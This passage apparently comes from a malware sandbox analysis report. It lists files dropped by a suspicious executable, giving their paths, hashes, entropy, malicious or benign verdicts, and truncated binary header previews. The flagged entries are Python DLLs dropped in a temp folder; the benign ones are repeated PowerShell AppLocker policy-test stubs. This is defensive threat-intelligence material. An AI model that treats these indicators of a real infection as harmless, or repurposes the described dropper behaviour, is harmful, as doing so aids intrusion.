                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:HT7/CCq6VtNmp1IJoFD+0J7bFf8ZtXnxRCtzjCI0EIMhRKCFbJ:z7/CCq6VtNmp1Oo8ZxqiI0EIMhRKQJ
                                                                                                                                                                                                                                                    MD5:EECBE6CD7AACD87B6F26A4AE11023E63
                                                                                                                                                                                                                                                    SHA1:3871C36DF783CDDC66FC42F3BB1D3EB3B489F1F9
                                                                                                                                                                                                                                                    SHA-256:2F11ED07C2BD9262072BC4E8B9C99E03A3D6CA4712ACB6D4C87393FDDAB8F205
                                                                                                                                                                                                                                                    SHA-512:ED284EC9198569C69115AC8CCBB8C873CEA81813A5838059A02A2B7DDBEFFABE459EC5D0351EE04E33FE8639A961EF4940BF395C1E740B50A2FD523C9D923EC2
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................i.............o.......7.........U....x......n......m.....Rich............PE..L....>.^...........!.....L...J.......S.......`..........................................................................T...,...........H...........................0b..................................@............`...............................text...*J.......L.................. ..`.rdata..T2...`...4...P..............@..@.data...............................@....rsrc...H...........................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\win32trace.pyd

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):15872
                                                                                                                                                                                                                                                    Entropy (8bit):5.815218462579117
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:FSBRJVY+svPnRYsTJWr4f0JIxRqHZHzErP/i:cBfVY+svvdTsr4fhxKQ7
                                                                                                                                                                                                                                                    MD5:75D14D4671698A4B141A7CFE68020667
                                                                                                                                                                                                                                                    SHA1:9AE60989DAA109EE87DB08249C0F9ED4B592CFCE
                                                                                                                                                                                                                                                    SHA-256:6E2DE688F381ECAD132971272E4F171606263CC9F8FCB3EABAF8A4E0602C1FE7
                                                                                                                                                                                                                                                    SHA-512:52989D33F4E3115DCEFA67B4790B1754C3E26CFFF8EC6FB9E04D6CB292BBC434E579A9E130D2F151032C88EC9034DA7AA6D402A2841F8B5E05E271A3AA78D7A1
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............{@..{@..{@..@..{@..@..{@..@..{@(..@..{@..z@..{@..@..{@..@..{@..@..{@Rich..{@........................PE..L....j.^...........!................P$.......0...............................p.......................................>..P...<7..x....P..@....................`......`1.............................. 6..@............0..@............................text...H........................... ..`.rdata..@....0....... ..............@..@.data........@.......0..............@....rsrc...@....P.......4..............@..@.reloc.. ....`.......8..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\win32ui.pyd

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):779264
                                                                                                                                                                                                                                                    Entropy (8bit):6.37133843214328
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:C08SW0XOKL6+NaYrgBOrNx8pSgv7PvwRZE7AR4wYEssGtPwmS0z6Z3qLV7NOMDHn:C0cvQt0fz6Z34RTAln
                                                                                                                                                                                                                                                    MD5:CF584E43F27C323E90FD668E9FEE377C
                                                                                                                                                                                                                                                    SHA1:633864E395CCE14F01621CE9C8EF76D6521677B1
                                                                                                                                                                                                                                                    SHA-256:94DB1996FBF71FC822B441E17865F429258F3F02CECC9609FDEB6785F0CD88B7
                                                                                                                                                                                                                                                    SHA-512:43D4B2D13CF1BAF2CA865F5B6E172945E97DE2734ACF36D6E5C7F304E6908B47AA1EE682DBB77225DD0AD4DC3A64B2AB783033BF201DC85FE00EE346E2100528
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9.4.}.Z.}.Z.}.Z....q.Z..0..|.Z.c-..~.Z.c-..q.Z.c-..t.Z.}.[..zZ.c-..J.Z.c-..|.Z.c-..|.Z.c-..|.Z.Rich}.Z.................PE..L....l.^...........!.....J...................`....(..........................P.......q...............................<..!M..$........0..h....................P..|....w..................................@............`...............................text....H.......J.................. ..`.rdata...)...`...*...N..............@..@.data...........^...x..............@....rsrc...h....0......................@..@.reloc..|....P......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ni22m55.ncl.ps1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cija1lh.len.ps1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3afv4do.nbt.ps1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecs13cco.4kv.ps1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_faq1obzc.hhm.psm1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ge3u44cy.lll.ps1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ht2qscvm.tmf.ps1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1bla3y0.xbj.psm1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3vlxqml.mu5.psm1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lvcoyte5.1kg.psm1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_osiblzuw.gxp.psm1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgosp4xp.s4o.psm1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pi2aobqf.vzk.ps1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3u5lz3k.0gy.psm1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwh3ttsz.gki.psm1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_srywzbcn.mhx.ps1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ttntsbrn.cxc.ps1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3rcjzs4.r1t.psm1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
